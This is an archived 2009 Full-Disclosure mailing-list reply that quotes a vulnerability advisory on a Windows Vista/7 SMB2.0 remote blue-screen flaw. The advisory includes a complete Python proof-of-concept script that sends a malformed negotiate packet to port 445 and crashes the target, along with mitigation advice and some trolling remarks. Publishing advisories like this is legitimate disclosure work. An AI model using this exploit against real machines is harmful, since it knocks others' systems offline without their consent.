| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 10 Sep 2009 10:54:33 +0200
From: D-vice <lord.x86@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL
REQUEST Remote B.S.O.D.
n3td3v works for micro$ucks, go figure
On Thu, Sep 10, 2009 at 6:56 AM, James Matthews <nytrokiss@...il.com> wrote:
> So Msoft! why can't they just stop reintroducing bugs?
>
>
> On Wed, Sep 9, 2009 at 11:04 AM, <randomguy@...hmail.com> wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> How come all I hear about is n3td3v, and I see noone crying out
>> lout about this :
>> http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
>> sk=show&action=view&id=64&Itemid=15<http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta%0Ask=show&action=view&id=64&Itemid=15>
>>
>> is fd all 'bout trolls nao?
>>
>> - --
>> =============================================
>> - - Release date: September 7th, 2009
>> - - Discovered by: Laurent GaffiƩ
>> - - Severity: Medium/High
>> =============================================
>>
>> I. VULNERABILITY
>> - -------------------------
>> Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
>> II. BACKGROUND
>> - -------------------------
>> Windows vista and newer Windows comes with a new SMB version named
>> SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
>> erver_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> - -------------------------
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionnality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
>> to a SMB server, and it's used
>> to identify the SMB dialect that will be used for futher
>> communication.
>>
>> IV. PROOF OF CONCEPT
>> - -------------------------
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> # When SMB2.0 recieve a "&" char in the "Process Id High" SMB
>> header field it dies with a
>> # PAGE_FAULT_IN_NONPAGED_AREA
>>
>> from socket import socket
>> from time import sleep
>>
>> host = "IP_ADDR", 445
>> buff = (
>> "\x00\x00\x00\x90" # Begin SMB header: Session message
>> "\xff\x53\x4d\x42" # Server Component: SMB
>> "\x72\x00\x00\x00" # Negociate Protocol
>> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> "\x00\x26"# Process ID High: --> :) normal value should be
>> "\x00\x00"
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> "\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> - -------------------------
>> An attacker can remotly crash without no user interaction, any
>> Vista/Windows 7 machine with SMB enable.
>> Windows Xp, 2k, are NOT affected as they dont have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> - -------------------------
>> Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
>> Win Server 2008
>> as it use the same SMB2.0 driver (not tested).
>>
>> VII. SOLUTION
>> - -------------------------
>> Vendor contacted, but no patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>>
>> VIII. REFERENCES
>> - -------------------------
>> http://microsoft.com
>>
>> IX. CREDITS
>> - -------------------------
>> This vulnerability has been discovered by Laurent GaffiƩ
>> Laurent.gaffie{remove-this}(at)gmail.com
>> http://g-laurent.blogspot.com/
>>
>> X. LEGAL NOTICES
>> - -------------------------
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> -----BEGIN PGP SIGNATURE-----
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
>> mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
>> pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
>> 6kWcu5Q=
>> =MjSD
>> -----END PGP SIGNATURE-----
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> --
> http://www.jewelerslounge.com
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists